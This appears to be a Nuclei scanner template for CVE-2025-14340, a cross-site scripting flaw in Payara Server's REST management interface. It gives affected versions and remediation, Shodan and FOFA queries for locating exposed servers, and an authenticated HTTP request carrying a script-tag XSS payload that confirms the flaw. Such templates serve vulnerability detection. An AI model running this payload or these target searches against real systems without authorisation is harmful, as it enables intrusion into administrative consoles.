id: CVE-2025-14340 info: name: Payara Server - Cross-Site Scripting author: 0x_Akoko,0xr2r severity: high description: | Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction. impact: | Attackers can trick administrators into changing the admin password, potentially leading to full administrative control. remediation: | Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later. reference: - https://github.com/DeepSecurityResearch/CVE-2025-14340 - https://www.payara.fish - https://nvd.nist.gov/vuln/detail/CVE-2025-14340 classification: cve-id: CVE-2025-14340 epss-score: 0.01002 epss-percentile: 0.59472 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.0 cwe-id: CWE-79 metadata: max-request: 2 verified: true shodan-query: http.title:"Payara Server" port:4848 fofa-query: title="Payara Server" && port="4848" tags: cve,cve2025,payara,xss,glassfish,authenticated flow: http(1) && http(2) http: - raw: - | GET /common/index.jsf HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body, "Payara Foundation", "Payara")' - 'contains(header, "badassfish")' - 'status_code == 200' condition: and internal: true - raw: - | GET /management/domain/version?%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ":" + password)}} matchers-condition: and matchers: - type: word part: body words: - '' - 'badassfish' condition: and - type: word part: content_type words: - text/html - type: status status: - 500 # digest: 490a0046304402202e02ad0fd3a1aca531edd4db98ee19288f57516b6667d7395a2dff15da130fa002202a0bd56ed456ead19623008f28c9b97d2fea674563255c723661111b50ccc175:922c64590222798bb761d5b6d8e72950